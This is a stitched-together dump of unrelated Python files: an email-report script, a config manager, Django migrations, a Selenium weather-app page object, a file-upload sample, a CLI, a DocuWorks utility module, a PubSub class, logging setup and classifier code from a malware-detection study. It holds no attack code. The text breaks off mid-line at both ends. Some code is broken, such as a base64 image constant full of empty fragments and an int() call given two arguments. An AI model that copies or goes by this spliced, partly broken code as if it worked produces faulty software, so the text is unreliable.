name): raise NotImplementedError() reports_email.py #!/usr/bin/env python3 import os from datetime import date import reports import re import getpass import smtplib import emails # Inputs descriptions_dir = "/home/student/supplier-data/descriptions/" username = "student" pdf_path = "/tmp/processed.pdf" mail_server_ip = "localhost" # Get current date for pdf title date_string = date.today().strftime("%d-%m-%Y") date_line = "Processed update on {}".format(date_string) # Get description file paths file_list = os.listdir(descriptions_dir) txt_paths = [descriptions_dir + item for item in file_list if bool(re.search(r"txt", item))] # Generate pdf content paragraph_string = "" for txt_file in txt_paths: with open(txt_file) as in_file: content_list = in_file.readlines() paragraph_string += "name: {}
weight: {}

".format(content_list[0].replace("\n", ""), content_list[1].replace("\n", "")) if __name__ == "__main__": reports.generate_report(pdf_path, date_line, paragraph_string) email_msg = emails.generate_email( sender="", recipient=username + "@example.com", subject="Upload Completed - Online Fruit Store", body="All fruits are uploaded to our website successfully. A detailed list is attached to this email.", attachment=pdf_path) mail_server = smtplib.SMTP(mail_server_ip) emails.send_email( mail_serv=mail_server, email=email_msg) mail_server.quit() # -*- coding: utf-8 -*- """Functionality for configuring the the ``base_object`` package.""" # Includes functionality like get_config, set_config, and config_context # that is similar to scikit-learn. However,the code was altered to make # define the configuration as a class importable as a module similar to Tensorly # Modifications were also made to make things more easily extensible, by # driving the configuration settings based on a registry of configurations import os import sys import threading import types import warnings from contextlib import contextmanager from typing import Any, Dict, Iterator, List, Optional, Tuple try: from typing import Literal, TypedDict except ImportError: from typing_extensions import Literal, TypedDict # type: ignore __author__: List[str] = ["RNKuhns"] class ConfigParamSettingInfo(TypedDict): """Define types of the setting information for a given config parameter.""" env_name: str values: Tuple[Any, ...] default: Any _CONFIG_REGISTRY: Dict[str, ConfigParamSettingInfo] = { "print_changed_only": { "env_name": "BASE_OBJECT_PRINT_CHANGED_ONLY", "values": (True, False), "default": True, }, "display": { "env_name": "BASE_OBJECT_DISPLAY", "values": ("text", "diagram"), "default": "text", }, } _GLOBAL_CONFIG: Dict[str, Any] = { config_name: os.environ.get(config_info["env_name"], config_info["default"]) for config_name, config_info in _CONFIG_REGISTRY.items() } _THREAD_LOCAL_DATA = threading.local() class ConfigManager(types.ModuleType): """Configure the package.""" _default_config = _GLOBAL_CONFIG.copy() _threadlocal = _THREAD_LOCAL_DATA @classmethod def _get_threadlocal_config(cls) -> Dict[str, Any]: """Get a threadlocal **mutable** configuration. If the configuration does not exist, copy the default global configuration. Returns ------- threadlocal_global_config : dict Threadlocal global config or copy of default global configuration. """ if not hasattr(cls._threadlocal, "global_config"): cls._threadlocal.global_config = cls._default_config.copy() threadlocal_global_config = cls._threadlocal.global_config return threadlocal_global_config @classmethod def get_config_os_env_names(cls) -> List[str]: """Retrieve the os environment names for configurable settings. Returns ------- env_names : list The os environment names that can be used to set configurable settings. See Also -------- config_context : Configuration context manager. get_config : Retrieve current global configuration values. get_default_config : Return default global configuration values. set_config : Set global configuration. set_default_config : Reset configuration to default. Examples -------- >>> from base_object.config import get_config_os_env_names >>> get_config_os_env_names() ['BASE_OBJECT_PRINT_CHANGED_ONLY', 'BASE_OBJECT_DISPLAY'] """ return [config_info["env_name"] for config_info in _CONFIG_REGISTRY.values()] @classmethod def get_default_config(cls) -> Dict[str, Any]: """Retrive the default global configuration. Returns ------- config : dict The default configurable settings (keys) and their default values (values). See Also -------- config_context : Configuration context manager. get_config : Retrieve current global configuration values. get_config_os_env_names : Retrieve os environment names that can be used to set configuration. set_config : Set global configuration. set_default_config : Reset configuration to default. Examples -------- >>> from base_object.config import get_default_config >>> get_default_config() {'print_changed_only': True, 'display': 'text'} """ return _GLOBAL_CONFIG.copy() @classmethod def get_config(cls) -> Dict[str, Any]: """Retrieve current values for configuration set by :meth:`set_config`. Returns ------- config : dict The configurable settings (keys) and their default values (values). See Also -------- config_context : Configuration context manager. get_config_os_env_names : Retrieve os environment names that can be used to set configuration. get_default_config : Return default global configuration values. set_config : Set global configuration. set_default_config : Reset configuration to default. Examples -------- >>> from base_object.config import get_config >>> get_config() {'print_changed_only': True, 'display': 'text'} """ return cls._get_threadlocal_config().copy() @classmethod def set_config( cls, print_changed_only: Optional[bool] = None, display: Literal["text", "diagram"] = None, local_threadsafe: bool = False, ) -> None: """Set global configuration. Parameters ---------- print_changed_only : bool, default=None If True, only the parameters that were set to non-default values will be printed when printing a BaseObject instance. For example, ``print(SVC())`` while True will only print 'SVC()', but would print 'SVC(C=1.0, cache_size=200, ...)' with all the non-changed parameters when False. If None, the existing value won't change. display : {'text', 'diagram'}, default=None If 'diagram', instances inheritting from BaseOBject will be displayed as a diagram in a Jupyter lab or notebook context. If 'text', instances inheritting from BaseObject will be displayed as text. If None, the existing value won't change. local_threadsafe : bool, default=False If False, set the backend as default for all threads. Returns ------- None : None No output returned. See Also -------- config_context : Configuration context manager. get_config : Retrieve current global configuration values. get_config_os_env_names : Retrieve os environment names that can be used to set configuration. get_default_config : Return default global configuration values. set_default_config : Reset configuration to default. Examples -------- >>> from base_object.config import get_config, set_config >>> get_config() {'print_changed_only': True, 'display': 'text'} >>> set_config(display='diagram') >>> get_config() {'print_changed_only': True, 'display': 'diagram'} """ local_config = cls._get_threadlocal_config() if print_changed_only is not None: local_config["print_changed_only"] = print_changed_only if display is not None: local_config["display"] = display if not local_threadsafe: cls._default_config = local_config @classmethod def set_default_config(cls) -> None: """Reset the configuration to the default. Returns ------- None : None No output returned. See Also -------- config_context : Configuration context manager. get_config : Retrieve current global configuration values. get_config_os_env_names : Retrieve os environment names that can be used to set configuration. get_default_config : Return default global configuration values. set_config : Set global configuration. Examples -------- >>> from base_object.config import get_config, get_default_config, \ set_config, set_default_config >>> get_default_config() {'print_changed_only': True, 'display': 'text'} >>> set_config(display='diagram') >>> get_config() {'print_changed_only': True, 'display': 'diagram'} >>> set_default_config() >>> get_config() {'print_changed_only': True, 'display': 'text'} """ default_config = cls.get_default_config() cls.set_config(**default_config) @classmethod @contextmanager def config_context( cls, print_changed_only: Optional[bool] = None, display: Literal["text", "diagram"] = None, local_threadsafe: bool = False, ) -> Iterator[None]: """Context manager for global configuration. Parameters ---------- print_changed_only : bool, default=None If True, only the parameters that were set to non-default values will be printed when printing a BaseObject instance. For example, ``print(SVC())`` while True will only print 'SVC()', but would print 'SVC(C=1.0, cache_size=200, ...)' with all the non-changed parameters when False. If None, the existing value won't change. display : {'text', 'diagram'}, default=None If 'diagram', instances inheritting from BaseOBject will be displayed as a diagram in a Jupyter lab or notebook context. If 'text', instances inheritting from BaseObject will be displayed as text. If None, the existing value won't change. local_threadsafe : bool, default=False If False, set the backend as default for all threads. Yields ------ None See Also -------- set_config : Set global configuration. get_config : Retrieve current values of the global configuration. get_config_os_env_names : Retrieve os environment names that can be used to set configuration. get_default_config : Return default global configuration values. set_default_config : Reset configuration to default. Notes ----- All settings, not just those presently modified, will be returned to their previous values when the context manager is exited. Examples -------- >>> from base_object.config import config_context >>> with config_context(display='diagram'): ... pass """ old_config = cls.get_config() cls.set_config( print_changed_only=print_changed_only, display=display, local_threadsafe=local_threadsafe, ) try: yield finally: cls.set_config(**old_config) @classmethod def initialize_config(cls) -> None: """Initialize the package configuration. The package configuration is initialized according to the following hierarchy: - Any configurations set in the os environment variables are retrieved - Configurable settings not set in os environment have their default values retrieved - Set config is used to initialize the configuration. Returns ------- None : None No output returned. See Also -------- config_context : Configuration context manager. get_config : Retrieve current values of the global configuration. get_config_os_env_names : Retrieve os environment names that can be used to set configuration. get_default_config : Return default global configuration values. set_config : Set global configuration. set_default_config : Reset configuration to default. """ config_setting: Any config_settings: Dict[str, Any] = {} for config_name in _CONFIG_REGISTRY: config_setting = os.environ.get( _CONFIG_REGISTRY[config_name]["env_name"], cls._default_config[config_name], ) if config_setting == "True": config_setting = True if config_setting == "False": config_setting = False if config_setting not in _CONFIG_REGISTRY[config_name]["values"]: msg = f"{_CONFIG_REGISTRY[config_name]['env_name']} should be one of " msg += ( f"{', '.join(map(repr, _CONFIG_REGISTRY[config_name]['values']))}." ) msg += "Using default value for this configuration as a result." warnings.warn(msg, UserWarning) config_setting = cls._default_config[config_name] config_settings[config_name] = config_setting cls._default_config = config_settings cls.set_config(**config_settings) def __dir__(self) -> List[str]: """Indicate items in the scope.""" return [ "config_context", "get_config", "get_config_os_env_names", "get_default_config", "set_config", "set_default_config", "ConfigManager", ] # Initialise the backend to the default one ConfigManager.initialize_config() sys.modules[__name__].__class__ = ConfigManager # -*- coding: utf-8 -*- # Generated by Django 1.9 on 2016-05-09 10:34 from __future__ import unicode_literals import django.db.models.deletion from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('accounts', '0005_auto_20160509_0801'), ] operations = [ migrations.AddField( model_name='profile', name='current_team', field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='accounts.Profile'), ), ] sample/mobile/src/pages/weather_page.py from common._webdriver_qa_api.mobile.mobile_element import MobileElement from common._webdriver_qa_api.mobile.mobile_page import MobilePage from selenium.webdriver.common.by import By class WeatherPage(MobilePage): def __init__(self): super().__init__(locator_type=By.ID, locator='weather', name="Main weather page") self.lbl_location = MobileElement(By.ID, "com.yahoo.mobile.client.android.weather:id/location") self.lbl_location_time = MobileElement(By.ID, "com.yahoo.mobile.client.android.weather:id/local_time") self.btn_menu = MobileElement(By.ID, "com.yahoo.mobile.client.android.weather:id/sidebarButton") self.btn_add_location = MobileElement(By.ID, "com.yahoo.mobile.client.android.weather:id/addLocationButton") self.lbl_current_temperature = MobileElement(By.ID, "com.yahoo.mobile.client.android.weather:id/temperature") self.lbl_weather_description = MobileElement(By.ID, "weather_description") self.lbl_max_daily_temperature = MobileElement(By.ID, "com.yahoo.mobile.client.android.weather:id/temp_high") self.lbl_min_daily_temperature = MobileElement(By.ID, "com.yahoo.mobile.client.android.weather:id/temp_low") self.img_refresh = MobileElement(By.ID, "com.yahoo.mobile.client.android.weather:id/fl_inner") def refresh_data(self): self.swipe_down() self.img_refresh.wait_element_absent(timeout=5) def get_location(self) -> str: return self.lbl_location.text def get_current_temperature(self) -> int: return int(self.lbl_current_temperature.text[:-1]) def get_high_temperature(self) -> int: return int(self.lbl_max_daily_temperature.text[:-1], self.lbl_min_daily_temperature.text[:-1]) def click_add_location(self): self.btn_add_location.click() def open_menu(self): self.btn_menu.click() from samples.Logic import TokenHandler from samples.Logic import ForceBridgeConnector import urllib3 urllib3.disable_warnings() user = "GitHub" password = "" urlToken = "https://forcebridgehackathon.force.eco:25443/ffauth/oauth2.0/accessToken?client_id=" + user + "&client_secret=" + password + "&grant_type=client_credentials&scope=read%20write" urlToBridgeAPI = "https://forcebridgehackathon.force.eco:24443/ffwebservices/api/v3/" documentID = "F318273D75604B9EA1E255AAF522A477" fileName = "Test.txt" print("Welcome to uploading a file example!\n") print("Determine token ...\n") tokenhandler = TokenHandler.TokenHandler tokeninit = tokenhandler(user, password, urlToken) token = tokeninit.GetAccessToken() accessToken = token['access_token'] print("Token: " + accessToken + "\n") print("Upload ....\n") files=[ ('file', ('Test.txt', open('Test.txt', 'rb'), 'text/plain')) ] Connector = ForceBridgeConnector.FORCEBridgeConnector BridgeConnector = Connector(urlToBridgeAPI, accessToken) header = BridgeConnector.Tokenheader(accessToken) upload = BridgeConnector.PutFileinDocument(documentID, fileName, header, files) print(upload, "\n") print("Editor {} uploads file {} into documentID {} with version {} ".format(upload['properties']['editor'], upload['properties']['name'], upload['properties']['id'], upload['properties']['version'])) kerenleibovich/mlappmlapp/mlapp_cli/environment.py import click, os from mlapp.mlapp_cli.common.cli_utilities import set_env, create_file, create_directory from mlapp.mlapp_cli.cli_help import cli_environment_help @click.group("environment") def commands(): """ ML App Environment Command """ pass @commands.command("init", help=cli_environment_help.get('init', 'init environment file')) @click.argument("name", required=True, default='.env') def init(name): try: if '.env' not in name: name += '.env' env_full_path = os.path.join(os.getcwd(), os.path.join('env', name)) if not os.path.exists(env_full_path): # creates the env directory if not exists. create_directory(directory_name='env', include_init=False) # creates env file create_file(name, path='env') # set the new env file set_env(name) else: click.secho("ERROR: '" + name + "' file already exits.", fg='red') except Exception as e: click.secho("ERROR: Oops, something went wrong.", fg='red') @commands.command("set", help=cli_environment_help.get('set', 'sets environment file')) @click.argument("name", required=True) def set(name): try: if '.env' not in name: name += '.env' # set the new env file set_env(name) except Exception as e: click.secho("ERROR: Oops, something went wrong.", fg='red') #!/usr/bin/env python3 # vim: set fileencoding=utf-8 fileformat=unix expandtab : """common.py -- common utility functions Copyright (C) 2010 <> All rights reserved. This software is subject to the provisions of the Zope Public License, Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution. THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS FOR A PARTICULAR PURPOSE. """ import os import re import base64 import time import datetime from functools import reduce from winreg import QueryValueEx, OpenKey, HKEY_LOCAL_MACHINE from .xdwapi import * from .observer import * from .timezone import * __all__ = ( "PIL_ENABLED", "CP", "CODEPAGE", "DEFAULT_TZ", "EV_DOC_REMOVED", "EV_DOC_INSERTED", "EV_PAGE_REMOVED", "EV_PAGE_INSERTED", "EV_ANN_REMOVED", "EV_ANN_INSERTED", "EV_ATT_REMOVED", "EV_ATT_INSERTED", "PSEP", "ASEP", "BLANKPAGE", "mm2in", "in2mm", "mm2px", "px2mm", "environ", "get_viewer", "inner_attribute_name", "outer_attribute_name", "adjust_path", "cp", "uc", "derivative_path", "newpath", "joinf", "flagvalue", "typevalue", "makevalue", "scale", "unpack", "charset_to_codepage", "codepage_to_charset", "set_ansi_charset", "set_oem_charset", ) PIL_ENABLED = True try: import Image except ImportError: try: from PIL import Image except ImportError: PIL_ENABLED = False if PIL_ENABLED: __all__ += ("Image",) PSEP = "\f" # page separator ASEP = "\v" # annotation separator CODEPAGE = f"cp{CP}" DEFAULT_TZ = JST # Observer pattern event EV_DOC_REMOVED = 11 EV_DOC_INSERTED = 12 EV_PAGE_REMOVED = 21 EV_PAGE_INSERTED = 22 EV_ANN_REMOVED = 31 EV_ANN_INSERTED = 32 EV_ATT_REMOVED = 41 EV_ATT_INSERTED = 42 BLANKPAGE = base64.b64decode( b"" b"" b"" b"" b"" b"" b"" b"WWiZ3nLz9ybH" b"SMn6N7lbLBvcP4N9bdr5aEvDiYGW+yhq/UcRKie8S+m7Gh3pZ+I8k67z8DRa" b"LMYeMyMWl+/EwXEPJlM8/qFlHHM3+s4KfKy7nQYeP+2alrTqceBJzkvl/G8l" b"jtuuv8lVZ0thyuzH3c72Kyw/SsoLtq3Yc0fBxJT633I+qcpvYyFzrf8fZ59P" b"" b"" b"/" b"" b"" b"" b"+" b"" b"ApVCwoTBOFAUqiAUJgnCgKVRUKEwThQFKo0FjYJPG4gKVR8KEwThQFKpIFCY" b"JwoClUpChME4UBSqXBQmCcKApVMwoTBOFAUqnAWNBVEbBrPEqnoUJgnCgKVa" b"CChME4UBSrQ4UJgnCgKVaMChME4UBSrSIUJgnCgKVaWCxpQpjQZZwalWmwoT" b"BOFAUq1AFCYJwoClWpQoTBOFAUq1UFCYJwoClWrwoTBOFAUhG2ongq29s7iy" b"T0y00ndosCO02exytv0TF89Mbz7yPvs72a+gkHD2kd0tVAc6gVfNbZpvmW5W" b"/linqmfRtX+cwuu5h1+ryOlI9JRkpyUpIATEqCZMjgWZxG9Lr7F9LrRpS0+u" b"Iu15yzQVWGKYwqc/FqVIqdCNZ2GH78VOiq6O6Z6Kv4Ks7ukFTpKs9FTCp01V" b"KeAO5OV1pR017/sBaYtCOxaHgGUagAEAggEAgwIHJ4QCBI2FBFLFTQqGBBoA" b"AAA=") INCH = 25.4 mm2in = lambda v: v / INCH in2mm = lambda v: v * INCH mm2px = lambda v, dpi: v / INCH * dpi px2mm = lambda v, dpi: v / dpi * INCH def environ(name=None, x64=False): """DocuWorks environment information.""" incompats = {XDW_GI_INSTALLPATH: "InstallPath", XDW_GI_BINPATH: "InstallBinPath"} vendor = "FujiXerox" if XDW_VERSION < "9.1" else "FUJIFILM" def getvalue(name): n = XDW_ENVIRON.normalize(name) if not n: raise InfoNotFoundError(f"illegal name '{name}'") if n == XDW_GI_DWDESK_FILENAME_DIGITS: return ord(XDW_GetInformation(n)) if n == XDW_GI_OCRENABLER_STATE: try: return not XDW_GetInformation(n) except InvalidArgError: return False if x64 and n in incompats: return uc(QueryValueEx( OpenKey(HKEY_LOCAL_MACHINE, f"SOFTWARE\\{vendor}\\MPM3"), incompats[n])[0]) try: return uc(XDW_GetInformation(n)) except InfoNotFoundError as e: return None if name: return getvalue(name) values = dict() for v in XDW_ENVIRON.values(): if ((v == "TASKSPACEPATH" and XDWVER < 8) or (v == "OCRENABLER_STATE" and XDWVER < 9)): continue c = getvalue(v) if c is not None: values[v] = c return values def linkfolders(): result = dict() for i in range(XDW_GetLinkRootFolderNumber()): info = XDW_GetLinkRootFolderInformation(i + 1) result[info.szLinkRootFolderName.decode(CODEPAGE)] = \ info.szPath.decode(CODEPAGE) return result def get_viewer(light=False, lightonly=False): """Get pathname of DocuWorks Viewer (Light). light (bool) force to use DocuWorks Viewer Light. Note that DocuWorks Viewer is used if Light version is not avaiable. """ env = environ() viewer = env.get("DWVIEWERPATH") if light or not viewer: viewer = env.get("DWVLTPATH", viewer) if not viewer: raise NotInstalledError("DocuWorks Viewer (Light) is not installed") return viewer def joinf(sep, seq): """sep.join(seq), omitting None, null or so.""" return sep.join([s for s in filter(bool, seq)]) or None def inner_attribute_name(name): """Get XDWAPI style attribute name e.g. font_name --> %FontName""" if isinstance(name, bytes): return name if name.startswith("%"): return cp(name) if "A" <= name[0] <= "Z": return cp("%" + name) return cp("%" + "".join([s.capitalize() for s in name.split("_")])) def outer_attribute_name(name): """Get xdwlib style attribute name e.g. %FontName --> font_name""" if isinstance(name, str): return name name = uc(name) if not name.startswith("%"): return name return re.sub("([A-Z])", r"_\1", name[1:])[1:].lower() def adjust_path(path, dir="", ext=".xdw", coding=None): """Build a new pathname with filename and directory name. path (str) pathname Full pathname is acceptable as well as bare filename (basename). dir (str) replacement directory ext (str) default extension to append if original path has no one coding (str) encoding of the result as bytes; None = str (don't encode) Returns a full pathname. Example: >>> import os; os.getcwd() 'C:\\your\\favorite\\directory' >>> adjust_path('') '' >>> adjust_path('example.xdw') 'C:\\your\\favorite\\directory\\example.xdw' >>> adjust_path('example.xdw', dir='C:\\another\\directory') 'C:\\another\\directory\\example.xdw' >>> adjust_path('C:\\your\\favorite\\directory\\example.xdw', ... dir='C:\\another\\directory') 'C:\\another\\directory\\example.xdw' >>> adjust_path('example.xdw', dir='C:\\another\\directory', ext='.pdf') 'C:\\another\\directory\\example.xdw' >>> adjust_path('example', dir='C:\\another\\directory', ext='.pdf') 'C:\\another\\directory\\example.pdf' """ if not (path or dir): return "" directory, basename = os.path.split(path) directory = dir or directory or os.getcwd() path = os.path.abspath(os.path.join(directory, basename)) if basename and not os.path.splitext(basename)[1]: path += "." + ext.lstrip(".") if coding and isinstance(path, str): path = path.encode(coding) return path def cp(s): """Coerce str into bytes.""" if not s: return b"" if isinstance(s, str): return s.encode(CODEPAGE) if isinstance(s, bytes): return s raise TypeError(f"str or bytes expected, {s.__class__} given") def uc(s): """Coerce bytes into str.""" if not s: return "" if isinstance(s, bytes): return s.decode(CODEPAGE) if isinstance(s, str): return s raise TypeError(f"str or bytes expected, {s.__class__} given") def derivative_path(path): """Convert pathname to n-th derivative e.g. somedocument-2.xdw or so. Addtional number (2, 3, ...) is determined automatically. If pathname given does not exist, original pathname is returned. """ if not os.path.exists(path): return path root, ext = os.path.splitext(path) n = 2 derivative = f"{root}-{n}{ext}" while os.path.exists(derivative): n += 1 derivative = f"{root}-{n}{ext}" return derivative def newpath(path, dir="", ext=".xdw", coding=None): """Build a new pathname available for output.""" def eval(path): return path() if callable(path) else path if not path: path = adjust_path(eval(path), dir=dir, ext=ext, coding=coding) elif not os.path.dirname(path): path = adjust_path(eval(path), dir=dir) else: path = adjust_path(eval(path)) return derivative_path(path) def flagvalue(table, value, store=True): """Sum up flag values according to XDWConst table.""" if store and isinstance(value, (int, float)): return int(value) if store: if not value: return 0 value = [table.normalize(f.strip()) for f in value.split(",") if f] if not value: return 0 return reduce(lambda x, y: x | y, value) return ",".join(table[b] for b in sorted(table.keys()) if b & value) def typevalue(value): """Get XDWAPI-compatible type and ctypes-compatible value.""" if isinstance(value, bool): return (XDW_ATYPE_BOOL, c_int(-1 if value else 0)) if isinstance(value, int): return (XDW_ATYPE_INT, c_int(value)) #elif isinstance(value, bytes): # return (XDW_ATYPE_STRING, value) elif isinstance(value, str): return (XDW_ATYPE_STRING, value) elif isinstance(value, datetime.date): value = int(time.mktime(value.timetuple()) - time.timezone) return (XDW_ATYPE_DATE, c_int(value)) else: return (XDW_ATYPE_OTHER, value) def makevalue(t, value): """Get value of ctypes-compatible value in XDWAPI-compatible type.""" t = XDW_ATTRIBUTE_TYPE.normalize(t) if t == XDW_ATYPE_INT: return int(value) elif t == XDW_ATYPE_STRING: return str(value) elif t == XDW_ATYPE_DATE: return datetime.date.fromtimestamp(value + time.timezone) elif t == XDW_ATYPE_BOOL: return bool(value) return value def scale(attrname, value, store=False): """Scale actual size (length) to stored value and vice versa.""" unit = XDW_ANNOTATION_ATTRIBUTE[attrname][1] if not unit: return value if isinstance(unit, XDWConst): if attrname in (XDW_ATN_FontStyle, XDW_ATN_FontPitchAndFamily): return flagvalue(unit, value, store=store) if store: return unit.normalize(value) return unit[value] mo = re.match(r"(1/)?([\d.]+)", unit) if not mo: return float(value) inv, unit = mo.groups() if bool(inv) ^ store: return value / float(unit) else: return value * float(unit) def unpack(s): """Unpack little-endian octets into int.""" n = 0 for c in s: n <<= 8 n += ord(c) return n CHARSET_CODEPAGE = { DEFAULT_CHARSET: CP, ANSI_CHARSET: 1252, SYMBOL_CHARSET: 899, MAC_CHARSET: 10000, SHIFTJIS_CHARSET: 932, HANGEUL_CHARSET: 949, CHINESEBIG5_CHARSET: 950, GREEK_CHARSET: 869, TURKISH_CHARSET: 1026, BALTIC_CHARSET: 775, RUSSIAN_CHARSET: 855, EASTEUROPE_CHARSET: 852, OEM_CHARSET: 65001, } CODEPAGE_CHARSET = {cp: cs for (cs, cp) in CHARSET_CODEPAGE.items()} def charset_to_codepage(charset): return CHARSET_CODEPAGE.get(XDW_FONT_CHARSET.normalize(charset), CP) def codepage_to_charset(codepage): return CODEPAGE_CHARSET.get(codepage, OEM_CHARSET) def set_ansi_charset(codepage): CHARSET_CODEPAGE[ANSI_CHARSET] = codepage def set_oem_charset(codepage): CHARSET_CODEPAGE[OEM_CHARSET] = codepage # MIT License # # Copyright (c) 2021 # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. class PubSub(object): _subscriptions: dict def __init__(self): self._subscriptions = {} def has_channel(self, channel: str) -> bool: """ checks if the _subscriptions variable has the channel as a key :param channel: str :rtype: bool :return: True if it has the channel as a key """ return channel in self._subscriptions.keys() def channel_has_key(self, channel: str, key: int) -> bool: """ :param channel: used for calling self.has_channel internally :param key: used for checking if this key exists :rtype: bool :return: True if the key exists in the channel """ if not self.has_channel(channel): return False return key in self._subscriptions[channel].keys() def get_subscription_count(self, channel: str) -> int: """ gets the count of keys in channel :param channel: str :rtype: int :return: -1 if the channel does not exist else the count of keys """ if not self.has_channel(channel): return -1 return len(self._subscriptions[channel].keys()) def publish(self, channel: str, message) -> bool: """ publish a message to the channel :param channel: str :param message: Any python object :rtype: bool :return: False if the channel does not exist else true """ if not self.has_channel(channel): return False for sub in self._subscriptions[channel].values(): sub(message) return True def pub(self, channel: str, msg) -> bool: """ this is a shorthand function for publish :param channel: str :param msg: Any python object :rtype: bool :return: False if the channel does not exist else true """ return self.publish(channel, msg) def p(self, channel: str, msg) -> bool: """ this is a shorthand function for publish :param channel: str :param msg: Any python object :rtype: bool :return: False if the channel does not exist else true """ return self.publish(channel, msg) def subscribe(self, channel: str, callback) -> int: """ add a callback function to a channel :param channel: str :param callback: function which shall be called when new data comes in :rtype: int :return: the key, which has been assigned to the callback """ if not self.has_channel(channel): self._subscriptions[channel] = {} k = self.get_subscription_count(channel) + 1 self._subscriptions[channel][k] = callback return k def sub(self, channel: str, cb) -> int: """ shorthand function for subscribe :param channel: str :param cb: function which shall be called when new data comes in :rtype: int :return: the key, which has been assigned to the callback """ return self.subscribe(channel, cb) def s(self, channel: str, cb) -> int: """ shorthand function for subscribe :param channel: str :param cb: function which shall be called when new data comes in :rtype: int :return: the key, which has been assigned to the callback """ return self.subscribe(channel, cb) def unsubscribe(self, channel: str, key: int) -> bool: """ deletes a callback by its key from a channel :param channel: str :param key: the previously obtained key :rtype: bool :return: False if the channel or key does not exist else True """ if not self.channel_has_key(channel, key): return False del self._subscriptions[channel][key] return True def unsub(self, channel: str, key: int) -> bool: """ shorthand function for unsubscribe :param channel: str :param key: the previously obtained key :rtype: bool :return: False if the channel or key does not exist else True """ return self.unsubscribe(channel, key) def u(self, channel: str, key: int) -> bool: """ shorthand function for unsubscribe :param channel: str :param key: the previously obtained key :rtype: bool :return: False if the channel or key does not exist else True """ return self.unsubscribe(channel, key) def clear(self) -> None: """ remove all callbacks from all channels """ self._subscriptions.clear() def clear_channel(self, channel: str) -> bool: """ remove all callbacks from a specific channel :param channel: str :rtype: bool :return: False if the channel does not exist else True """ if not self.has_channel(channel): return False self._subscriptions[channel].clear() return True __all__ = ["PubSub"] drevicko/OpenKI # Copyright (c) 2020. CSIRO Australia. # # Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated # documentation files (the "Software"), to deal in the Software without restriction, including without limitation the # rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, # and to permit persons to whom the Software is furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all copies or substantial portions of # the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO # THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, # TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. # # from OpenKI.OpenKI_Data import * # from OpenKI.RelationScorers import * # from OpenKI.LossFunctions import * # from OpenKI.Constants import * # from OpenKI.Evaluation import * # from OpenKI.UtilityFunctions import * import logging import sys logger = logging.getLogger(__name__) logger.setLevel(logging.INFO) logging_handler = logging.StreamHandler(sys.stdout) logging_handler.setLevel(logging.INFO) logging_formatter = logging.Formatter(fmt='%(levelname).1s %(asctime)s [%(filename)s:%(lineno)s] %(message)s', datefmt='%m-%d %H:%M:%S') logging_handler.setFormatter(logging_formatter) logger.addHandler(logging_handler) # workaround for double logging issue from absl introduced by tensorboard logger.propagate = False # # NOTE: alternative workaround for absl ouble logging issue: # import absl.logging # logging.root.removeHandler(absl.logging._absl_handler) # absl.logging._warn_preinit_stderr = False mjovanc/tidlundsved # Generated by Django 2.0.2 on 2018-03-02 17:35 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('ved', '0004_auto_20180302_1732'), ] operations = [ migrations.AlterField( model_name='order', name='product_type', field=models.CharField(choices=[('Blandat lövträd', 'Blandat lövträd'), ('Björkved', 'Björkved'), ('Bokved', 'Bokved'), ('Askved', 'Askved'), ('Övrigt', 'Övrigt')], default=1, max_length=50), ), ] Rasoul-Jahanshahi/Hardware_Performance_Counters_Can_Detect_Malware_Myth_or_Fact import learn_all_boyou, learn_1k_cv, \ logging, sys, random, os, time, json, itertools import numpy as np from sklearn.model_selection import StratifiedKFold class learn_1k_cv_optimization(learn_1k_cv.learn_1k_cv): def setup_classifiers(self): """ setup_classifiers only generate the classifier class objects. nothing more. Note that KNeighborsClassifier is inherited from learn_all_boyou instead of sklearn (learn_all_boyou inherits the implements from sklearn). """ # self.names = [\ # "Nearest Neighbors", \ # "Decision Tree", \ # "Random Forest", \ # "AdaBoost", \ # "Naive Bayes",\ # "Neural Net" \ # #### "Logistic Regression",\ # #### "Linear SVM", "Rbf SVM", "Poly SVM", "Sigmoid SVM"\ # ####, "Gaussian Process" # ] max_iterations = 1000 # self.classifiers = [ \ # learn_all_boyou.KNeighborsClassifier(\ # n_neighbors=7, weights='uniform', algorithm='auto', n_jobs=-1),\ # learn_all_boyou.DecisionTreeClassifier(\ # max_depth=17, min_samples_split=12, min_samples_leaf=12,\ # presort=True, max_features=None,\ # random_state=int(round(time.time()))),\ # 